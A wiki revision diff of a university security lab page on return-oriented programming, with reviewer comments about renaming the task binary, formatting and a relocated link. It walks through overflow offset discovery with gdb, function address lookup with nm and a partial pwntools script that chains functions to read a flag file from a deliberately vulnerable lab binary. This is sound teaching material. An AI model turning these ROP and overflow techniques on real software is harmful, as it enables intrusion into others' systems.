Differences


cns:labs:lab-09 [2020/12/14 16:39]
mihai.dumitru2201 [Supporting files]
cns:labs:lab-09 [2022/12/05 13:36] (current)
mihai.dumitru2201 [Tasks]
Line 1: Line 1:
-====== Lab 09 - Return Oriented Programming (Part 2) ====== +====== Lab 09 - Return-Oriented Programming (Part 2) ======
- +
-===== Resources ===== +
- +
-  * [[http://​neilscomputerblog.blogspot.ro/​2012/​06/​stack-pivoting.html|More about stack pivoting and creating a "fake stack"​]] +
  
 ===== Introduction ===== ===== Introduction =====
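Review bot: the "Resources" section deleted here is re-added verbatim at the bottom of the page in the last hunk of this diff, so nothing is lost; the only wording change in this hunk is the title hyphenation ("Return-Oriented"), which should match the title of the Part 1 lab page so the two labs are listed consistently.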
Line 34: Line 29:
  
 ===== Tasks ===== ===== Tasks =====
 +
 +All content necessary for the CNS laboratory tasks can be found in [[cns:​resources:​repo|the CNS public repository]]. ​
 +
 +
  
 ==== 1. Return to main ==== ==== 1. Return to main ====
  
-Inspect the source file ''​task1.c''​. See if you can spot the vulnerability.+Inspect the source file ''​ret_to_main.c''​. See if you can spot the vulnerability.
  
 The goal of the task is to get the contents of the ''​flag''​ file through the binary. In order to do this, we need to chain three functions together. The goal of the task is to get the contents of the ''​flag''​ file through the binary. In order to do this, we need to chain three functions together.
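Review bot: the added repository pointer ends with a trailing space and is followed by two empty lines before the "1. Return to main" heading; a single blank line is enough in DokuWiki. Since the task now refers to ''ret_to_main.c'' rather than ''task1.c'', consider naming the lab directory inside the repository where that file lives, so readers can find it without searching.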
Line 44: Line 43:
  
 <code asm> <code asm>
-# gdb ./task1+# gdb ./ret_to_main
 gdb-peda$ pattc 0x40 gdb-peda$ pattc 0x40
 '​AAA%AAsAABAA$AAnAACAA-AA(AADAA;​AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH'​ '​AAA%AAsAABAA$AAnAACAA-AA(AADAA;​AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH'​
 gdb-peda$ r gdb-peda$ r
-Starting program: /​cns/​lab-11/​sol/​task1+Starting program: /​cns/​lab-11/​sol/​ret_to_main
 Welcome to our Retired Old Programmers message board! Welcome to our Retired Old Programmers message board!
 Please leave a message: Please leave a message:
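Review bot: the binary name was updated to ''ret_to_main'' but the captured gdb output still shows "Starting program: /cns/lab-11/sol/ret_to_main", a lab-11 path on a lab-09 page; either re-capture the session from the lab-09 directory or edit the path so the transcript matches the lab being described.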
Line 100: Line 99:
 </​code>​ </​code>​
  
-Our $rbp is at offset 48  => the return address will be at offset 56.+Our ''​$rbp'' ​is at offset 48  => the return address will be at offset 56.
  
 === Tutorial: Opening the flag file and returning to main === === Tutorial: Opening the flag file and returning to main ===
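Review bot: wrapping ''$rbp'' in monospace is a good change; while touching the line, the double space before "=>" could be collapsed and "=>" replaced with a word ("so the return address ..."), which reads better in prose than an arrow.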
Line 112: Line 111:
 We'll need to save a few useful addresses: We'll need to save a few useful addresses:
 <code bash> <code bash>
-# nm task1 | egrep "​main|stop|right|there|play"​+# nm ret_to_main ​| egrep "​main|stop|right|there|play"​
                 ​                 ​
 00000000004012b5 T main 00000000004012b5 T main
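Review bot: the line after the ''nm'' command is whitespace-only and should be dropped from the code block. The pattern could also use ''grep -E'' instead of ''egrep'', since current GNU grep marks ''egrep'' as obsolescent and prints a warning on newer distributions.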
Line 128: Line 127:
 from pwn import * from pwn import *
  
-io = process('​./​task1')+io = process('​./​ret_to_main')
  
 # Useful values # Useful values
Line 158: Line 157:
 <code bash> <code bash>
 # ./​test.py ​ # ./​test.py ​
-[+] Starting local process './task1': Done+[+] Starting local process './ret_to_main': Done
 [*] Switching to interactive mode [*] Switching to interactive mode
 -> secret vault opened -> secret vault opened
Line 164: Line 163:
 Please leave a message: ​ Please leave a message: ​
  
-[*] Stopped program './task1'+[*] Stopped program './ret_to_main'
 </​code>​ </​code>​
  
Line 323: Line 322:
 Now you are set to write a fully working ropchain to sequentially call the three functions in order to open, read and print the contents of the flag file. Now you are set to write a fully working ropchain to sequentially call the three functions in order to open, read and print the contents of the flag file.
  
 +===== Resources =====
 +
 +  * [[http://​neilscomputerblog.blogspot.ro/​2012/​06/​stack-pivoting.html|More about stack pivoting and creating a "fake stack"​]]
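Review bot: the relocated stack-pivoting link still uses plain ''http://'' and a ''blogspot.ro'' host; verify that the URL still resolves and prefer an ''https://'' link (or an archived copy) so the reference does not rot.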
cns/labs/lab-09.1607956755.txt.gz · Last modified: 2020/12/14 16:39 by mihai.dumitru2201
CC Attribution-Share Alike 3.0 Unported